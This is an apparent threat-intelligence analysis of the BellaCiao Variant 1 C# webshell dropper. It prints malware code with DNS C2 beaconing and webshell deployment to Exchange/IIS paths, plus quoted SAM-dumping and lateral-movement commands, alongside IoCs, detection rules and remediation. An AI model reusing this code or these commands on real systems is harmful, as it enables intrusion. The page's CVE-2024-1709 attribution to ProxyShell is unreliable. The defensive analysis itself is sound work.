BellaCiao Variant 1 - C# Webshell Dropper BellaCiao Variant 1 is a sophisticated C# Windows Service that implements DNS-based command and control with automatic webshell deployment to IIS and Microsoft Exchange server paths.
This page contains analysis of actual malware source code leaked from CharmingKitten’s internal network. The code samples are provided for threat intelligence and defensive purposes only.
Overview Variant 1 operates as a Windows Service named MicrosoftAgentServices that:
Performs DNS beaconing every 24 hours to C2 domains
Receives IP-encoded commands via DNS responses
Drops base64-encoded webshells to specific file system paths
Maintains persistence through Windows Service installation
Technical Architecture Windows Service Configuration The malware is implemented as a .NET Windows Service:
namespace MicrosoftAgentServices { public partial class Service1 : ServiceBase { public string dnsdomain = ".eposta.maill-support.com" ; public string dnsdomain2 = ".eposta.mailupdate.info" ; public string web = "i am good boy" ; // Base64 webshell payload Timer workerTime = new Timer (); protected override void OnStart ( string [] args ) { workerTime . Elapsed += new ElapsedEventHandler ( this . OnElapsedTime ); workerTime . Interval = 24 * 3600 * 1000 ; // 24 hours workerTime . Enabled = true ; } } }
Target Deployment Paths The malware targets specific IIS and Exchange Server paths:
// IIS wwwroot paths public string wwwroot = @"c:\inetpub\wwwroot\aspnet_client\" ; public string wwwroot2 = @"c:\inetpub\wwwroot\aspnet_client\system_web\" ; // Exchange OWA authentication paths public string webpathexh01 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\" ; public string webpathexh02 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\" ; public string webpathexh03 = @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\" ; // Webshell filenames public string [] arrayNames = new string [] { "aspnet.aspx" , "owafont.aspx" , "themes.aspx" , "logon.aspx" };
These paths are specifically chosen to blend in with legitimate Microsoft files and to be accessible via web requests to OWA authentication endpoints.
DNS Beaconing Mechanism Random Subdomain Generation The malware generates random subdomains for DNS queries:
private void OnElapsedTime ( object value1 , ElapsedEventArgs e ) { // Generate random string: 2 uppercase + 3 lowercase + "EXH" string randstr = RandomString ( 2 , false ) + RandomString ( 3 , true ); this . randomName = randstr ; // Construct beacon domain: e.g., "ABcdeEXH.eposta.maill-support.com" string finalhost = randstr + "EXH" + dnsdomain ; System . Net . IPHostEntry query = System . Net . Dns . GetHostEntry ( finalhost ); response = query . AddressList [ 0 ]. ToString (); } private string RandomString ( int size , bool lowerCase ) { StringBuilder builder = new StringBuilder ( size ); char offset = lowerCase ? 'a' : 'A' ; const int lettersOffset = 26 ; for ( int i = 0 ; i < size ; i ++ ) { char @char = ( char ) _random . Next ( offset , offset + lettersOffset ); builder . Append ( @char ); } return lowerCase ? builder . ToString (). ToLower () : builder . ToString (); }
DNS Query Pattern Query Pattern: [A-Z]{2}[a-z]{3}EXH.<primary_domain> Example: ABcdeEXH.eposta.maill-support.com Fallback: Same pattern with backup domain Example: ABcdeEXH.eposta.mailupdate.info
The “EXH” marker indicates Exchange Server targeting. This allows operators to distinguish between different deployment types in their C2 infrastructure.
Command Encoding via IP Address The malware uses DNS A record responses (IP addresses) to encode commands:
if ( ! String . IsNullOrEmpty ( response )) { string [] res = response . Split ( '.' ); // Command: Deploy webshell if ( res [ 3 ] == "58" ) { webwrite ( response ); } // Command: Remove webshells else if ( response == "212.175.168.59" ) { removeweb (); } }
IP-Encoded Command Structure IP Address Pattern Command Action *.*.*.58Deploy webshell Drop ASPX file to target path 212.175.168.*Choose IIS path Last octet determines wwwroot vs wwwroot2 212.176.168.*Choose Exchange path 1 OWA themes path 212.177.168.*Choose Exchange path 2 OWA themes resources 212.175.168.59Remove all webshells Delete all deployed files
Webshell Deployment Logic private void webwrite ( string response ) { string path = string . empty ; string [] choosePath = response . Split ( '.' ); bool isexh = ( choosePath [ 2 ] == "168" ); // Check if Exchange target string randName = this . randomName + ".aspx" ; if ( isexh ) { // Exchange Server paths if ( choosePath [ 1 ] == "175" ) path = ( choosePath [ 0 ] == "212" ) ? webpathexh01 + arrayNames [( int ) enuFileName . owafont ] : webpathexh01 + randName ; else if ( choosePath [ 1 ] == "176" ) path = ( choosePath [ 0 ] == "212" ) ? webpathexh02 + arrayNames [( int ) enuFileName . themes ] : webpathexh02 + randName ; else if ( choosePath [ 1 ] == "177" ) path = ( choosePath [ 0 ] == "212" ) ? webpathexh03 + arrayNames [( int ) enuFileName . logon ] : webpathexh03 + randName ; } else { // IIS paths if ( choosePath [ 1 ] == "175" ) path = ( choosePath [ 0 ] == "212" ) ? wwwroot + arrayNames [( int ) enuFileName . aspnet ] : wwwroot + randName ; else if ( choosePath [ 1 ] == "176" ) path = ( choosePath [ 0 ] == "212" ) ? wwwroot2 + arrayNames [( int ) enuFileName . aspnet ] : wwwroot2 + randName ; } // Decode and write webshell byte [] clearWeb = System . Convert . FromBase64String ( web . Replace ( "#" , "" ). Replace ( "@" , "" )); System . IO . File . WriteAllBytes ( path , clearWeb ); }
Webshell Capabilities The dropped webshells provide:
File Upload : Upload files to the compromised serverFile Download : Exfiltrate files from the serverCommand Execution : Execute arbitrary commands on the system
Webshell access is gained via HTTP/HTTPS requests to the OWA or IIS paths where the ASPX files were dropped.
Turkish Foreign Ministry Attack Variant 1 was used in the confirmed attack against Turkey’s Ministry of Foreign Affairs:
Attack Timeline
Recovered Commands
IoCs from Attack
Initial Access : ProxyShell exploitation (CVE-2024-1709)Service Installation : BellaCiao deployed as Windows ServiceDNS Beaconing : Queries to *.eposta.maill-support.comWebshell Drop : ASPX file deployed to Exchange OWA pathLateral Movement : Network enumeration and credential harvestingPersistence : Multiple webshells across different paths # Network reconnaissance net user / domain net group "Domain Admins" / domain nltest / dclist: # Credential access reg save HKLM\SAM sam.save reg save HKLM\SYSTEM system.save # Lateral movement net use \\ 10.20 . 1.5 \c$ / user:Admin1 @MFA < password >
Domains Queried:
*.eposta.maill-support.com Files Created:
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx Service Installed:
Name: MicrosoftAgentServices
Display Name: Microsoft Agent Services
Compromised Accounts:
Admin1@MFApfsenselondra@MFA See Episode 3 Intelligence for full attack analysis.
Indicators of Compromise File System IoCs # Exchange Server paths C:\Program Files \M icrosoft \E xchange Server \V 15 \F rontEnd \H ttpProxy \o wa \a uth \C urrent \t hemes \r esources \o wafont.aspx C:\Program Files \M icrosoft \E xchange Server \V 15 \F rontEnd \H ttpProxy \o wa \a uth \C urrent \t hemes \t hemes.aspx C:\Program Files \M icrosoft \E xchange Server \V 15 \F rontEnd \H ttpProxy \o wa \a uth \C urrent \l ogon.aspx # IIS paths C:\inetpub\wwwroot\aspnet_client\aspnet.aspx C:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx # Random named files matching pattern C:\inetpub\wwwroot\aspnet_client\[A-Z] {2} [a-z] {3} .aspx
Network IoCs DNS Queries: [A-Z]{2}[a-z]{3}EXH.eposta.maill-support.com [A-Z]{2}[a-z]{3}EXH.eposta.mailupdate.info Domains: eposta.maill-support.com eposta.mailupdate.info
Windows Service IoCs Service Name: MicrosoftAgentServices Namespace: MicrosoftAgentServices Timer Interval: 86400000 ms (24 hours)
Detection Strategies
Monitor for suspicious DNS patterns: # DNS query pattern ^ [ A-Z ] {2} [ a-z ] {3} EXH \. ( eposta \. maill-support \. com | eposta \. mailupdate \. info ) $
Detection logic:
Alert on queries to *.eposta.maill-support.com or *.eposta.mailupdate.info
Flag subdomains matching [A-Z]{2}[a-z]{3}EXH pattern
Monitor DNS query frequency (24-hour intervals)
Search for unauthorized ASPX files: # PowerShell search Get-ChildItem - Path "C:\inetpub\wwwroot\aspnet_client" - Filter * .aspx - Recurse Get-ChildItem - Path "C:\Program Files\Microsoft\Exchange Server" - Filter * .aspx - Recurse | Where-Object { $_ .FullName -like "*\owa\auth\Current\*" }
Look for:
Unexpected ASPX files in wwwroot\aspnet_client
New files in Exchange OWA authentication paths
Files matching random naming pattern [A-Z]{2}[a-z]{3}.aspx
Windows Service Detection
Identify suspicious services: # List services with "Microsoft" in name but not from Microsoft Get-WmiObject - Class Win32_Service | Where-Object { $_ .Name -like "*Microsoft*" -and $_ .PathName -notlike "*\Windows\*" } # Check for MicrosoftAgentServices specifically Get-Service - Name "MicrosoftAgentServices" - ErrorAction SilentlyContinue
title : BellaCiao Variant 1 DNS Beaconing status : experimental description : Detects DNS queries matching BellaCiao Variant 1 C2 pattern author : CharmingKitten Exposure Project date : 2025/01/01 logsource : product : dns detection : selection : query|re : '^[A-Z]{2}[a-z]{3}EXH\.(eposta\.maill-support\.com|eposta\.mailupdate\.info)$' condition : selection falsepositives : - Unknown level : critical
Isolate the system
Immediately disconnect the compromised server from the network to prevent further C2 communication and lateral movement.
Stop the service
Stop-Service - Name "MicrosoftAgentServices" - Force Set-Service - Name "MicrosoftAgentServices" - StartupType Disabled
Remove webshells
# Remove IIS webshells Remove-Item "C:\inetpub\wwwroot\aspnet_client\*.aspx" - Force # Remove Exchange webshells $owaPath = "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current" Get-ChildItem - Path $owaPath - Filter * .aspx - Recurse | Remove-Item - Force
Uninstall the service
sc delete MicrosoftAgentServices
Block C2 domains
Add DNS blocking or firewall rules for:
eposta.maill-support.comeposta.mailupdate.infoAll subdomains under these domains
Hunt for persistence
Search for additional persistence mechanisms:
Scheduled tasks
Registry run keys
Other services
Additional webshells
Reset credentials
Reset passwords for all accounts that may have been compromised, especially:
Domain administrator accounts
Exchange administrator accounts
Service accounts
BellaCiao Overview Return to BellaCiao overview
Variant 2 PowerShell reverse proxy variant
Technical Analysis Comprehensive technical analysis
Infrastructure Domains C2 domain infrastructure